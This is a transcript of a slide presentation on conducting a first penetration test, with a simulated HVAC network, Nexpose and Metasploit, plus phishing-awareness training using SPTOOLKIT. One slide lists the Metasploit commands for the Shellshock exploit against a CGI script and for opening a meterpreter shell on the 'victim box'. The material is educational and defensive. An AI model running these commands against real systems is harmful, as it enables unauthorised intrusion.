Presentation is loading. Please wait.

Presentation is loading. Please wait.

Presenter: Robbie Corley Organization: KCTCS

Published bySylvia Tapp Modified over 9 years ago

Similar presentations

Presentation on theme: "Presenter: Robbie Corley Organization: KCTCS"— Presentation transcript:

1 Anatomy of a Pentest: Proactive steps to address vulnerabilities in your network
Presenter: Robbie Corley Organization: KCTCS Senior Information Security Analyst

2 About me Personal Life / Interests Married
Bachelor’s in Music Business??? Favorite Show: Seinfeld Favorite Movie(s): Lord of the Rings / Hobbit Trilogy Favorite Aspects of IT Security: Reverse Engineering / Studying Shellcode Finding and Exploiting Software Vulnerabilties

3 Let’s Talk About Pentesting
What is a pentest? A pentest is a simulated attack against a system to prove or disprove the existence of vulnerabilities previously detected by a vulnerability scan. How does it work? You are the attacker: You will use exploits custom tailored to target specific flagged vulnerabilities from your previous vulnerability scan

4 Let’s Talk About Pentesting
Some history on Pentesting… Pentesting originally required manually compiling each individual exploit to test a vulnerability, all of which were usually coded in different programming languages and specific to OS builds (XP sp1, XP sp2, etc) What’s the advantage over a Vulnerability Scan and why conduct one? A Vulnerability Scan merely lays out the foundation for your network risk assessment A Pentest helps you fortify your network by discovering and patching security holes before the attackers do and keeps your auditors happy, which also keeps your boss happy  Pentesting “weeds out” false positives from a Vulnerability Scan while also validating vulnerabilities

5 Conducting your first pentest
Our Goal: To Scan and Validate vulnerabilities in a simulated environment to demonstrate the effectiveness of a Pentest Recommended Vendor: Rapid7 (Approved PCI scan vendor an added plus) Other recommendations: Tenable Nessus Open Source: OpenVAS Why Rapid7? Exploits are pre-compiled and you do not need to go online to search for them. Readily available, built into the software Scanner and Pentesting software both free to try Software Resources Used: Nexpose Vulnerability Scan Solution Metasploit Pentesting Solution

6 HVAC system SCAN & Pentest simulation
Breakdown: Your boss has requested a blind vulnerability/pentest assessment for your HVAC network Attack Vectors used: Client Side and Web A Blind Scan? A blind scan/pentest is when you scan/pentest a network without using known credentials. This helps to mimic a realistic cyber attack scenario HVAC Network Layout: HVAC A: Windows XP for server HVAC software: HVAC B: Linux Web Server for HVAC Web Services

7 HVAC server a: SCAN simulation
Vulnerability Scan Results using HVAC A: IP: OS: Windows XP HVAC CONSOLE SERVER

8 HVAC server A: pentest simulation
Pentest Live Demo using HVAC A: IP: OS: Windows XP HVAC CONSOLE SERVER

9 HVAC server B: SCAN simulation
Vulnerability Scan Results using HVAC B: IP: OS: Linux HVAC WEB SERVER Shellshock!!!!!!

10 HVAC server B: pentest simulation
Pentest Live Demo using HVAC B: IP: OS: Linux HVAC WEB SERVER

11 pentest SHELL COMMANDS USED
Commands used for future reference: To pull up web console, type : Alt +Tilde “~”, then… “use exploit/multi/http/apache_mod_cgi_bash_env_exec” “set RHOST ” (our victim box ip address) “set TARGETURI /cgi-bin/status” (path to vulnerable cgi-script) “set PAYLOAD linux/x86/meterpreter/bind_tcp” (exploit module) “run” Once in the compromised victim’s machine session, you can open a shell by simply typing “shell”. You will then be greeted with a linux shell 

12 USER awareness training PENTESTING USING social engineering MODULES
Why have User Awareness Training? Users can be more mindful of simple operations that can effectively help keep their documents and data safe We simply cannot monitor all of our users’ actions Hacker’s are keen on well structured network security, and seek out easier pathways of entry, i.e.: A phishing directed to an unsuspecting, un-training user On a personal note: Training gives our users a boost of confidence, knowing they are collectively making a difference in keeping themselves and the company more secure

13 USER awareness training PENTESTING USING social engineering PHISHING MODULES
How does it work? Phishing Modules use pre-made templates that resemble common Phishing s in the wild s can be tailored to re-direct users to informative phishing awareness videos upon the user interacting with a phishing What tools do I need? Easiest solution and what we will be using: SPTOOLKIT SPTOOLKIT is Opensource and requires little effort to setup Rapid7’s Metasploit Pentesting Software also includes a Social Engineering module with a pro license

14 USER awareness training Phishing around with SPTOOLKIT
Demo time! Link: Requirements: SMTP server Any Linux OS box with Apache and MySQL installed Recommended approach: Install Kali Linux which has Apache and MySql installed and enabled by default Commands to start MYSQL and Apache: Service apache2 start Service mysql start

15 USER awareness training Phishing around with SPTOOLKIT

16 That’s all folks This presentation and its supplemental video and software content can be downloaded by using the following link: (Secure Google-Drive repository) Links to Resources outside of this repository: SPTOOLKIT Setup Guide: -> download Community edition of Metasploit and Nexpose -> Kali Linux to be used as a pentesting environment and for SPTOOLKIT Social Engineering Module Want to chat with me outside of this conference about more IT Security topics? Shoot me an at:

17 Questions???

Download ppt "Presenter: Robbie Corley Organization: KCTCS"

Similar presentations

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
By Hiranmayi Pai Neeraj Jain

By Hiranmayi Pai Neeraj Jain
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 5 Port Scanning.

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 5 Port Scanning.
Offensive Security Part 1 Basics of Penetration Testing

Offensive Security Part 1 Basics of Penetration Testing
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.

A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.

CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.
1 Colorado University Guest Lecture: Vulnerability Assessment Chris Triolo Spring 2007.

1 Colorado University Guest Lecture: Vulnerability Assessment Chris Triolo Spring 2007.
Assessing Vulnerabilities ISA 4220 Server Systems Security James A. Edge Jr., CISSP, CISM, CISA, CPTE, MCSE Sr. Security Analyst Cincinnati Bell Technology.

Assessing Vulnerabilities ISA 4220 Server Systems Security James A. Edge Jr., CISSP, CISM, CISA, CPTE, MCSE Sr. Security Analyst Cincinnati Bell Technology.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.

The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.
Browser Exploitation Framework (BeEF) Lab

Browser Exploitation Framework (BeEF) Lab
Vulnerability Assessment & Penetration Testing By: Michael Lassiter Jr.

Vulnerability Assessment & Penetration Testing By: Michael Lassiter Jr.
Small Business Security By Donatas Sumyla. Content Introduction Tools Symantec Corp. Company Overview Symantec.com Microsoft Company Overview Small Business.

Small Business Security By Donatas Sumyla. Content Introduction Tools Symantec Corp. Company Overview Symantec.com Microsoft Company Overview Small Business.
Sample School Website Sydney Region ITSU School Support 2007.

Sample School Website Sydney Region ITSU School Support
VULNERABILITY MANAGEMENT Moving Away from the Compliance Checkbox Towards Continuous Discovery.

VULNERABILITY MANAGEMENT Moving Away from the Compliance Checkbox Towards Continuous Discovery.
Website Hardening HUIT IT Security | Sep 30 2011.

Website Hardening HUIT IT Security | Sep
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
RFC6520 defines SSL Heartbeats - What are they? 1. SSL Heartbeats are used to keep a connection alive without the need to constantly renegotiate the SSL.

RFC6520 defines SSL Heartbeats - What are they? 1. SSL Heartbeats are used to keep a connection alive without the need to constantly renegotiate the SSL.
Security Audit Tools Project. CT 395 IT Security I Professor Igbeare Summer Quarter 2009 August 25, 2009.

Security Audit Tools Project. CT 395 IT Security I Professor Igbeare Summer Quarter 2009 August 25, 2009.
Working with Applications Lesson 7. Objectives Administer Internet Explorer Secure Internet Explorer Configure Application Compatibility Configure Application.

Working with Applications Lesson 7. Objectives Administer Internet Explorer Secure Internet Explorer Configure Application Compatibility Configure Application.

Similar presentations

Ads by Google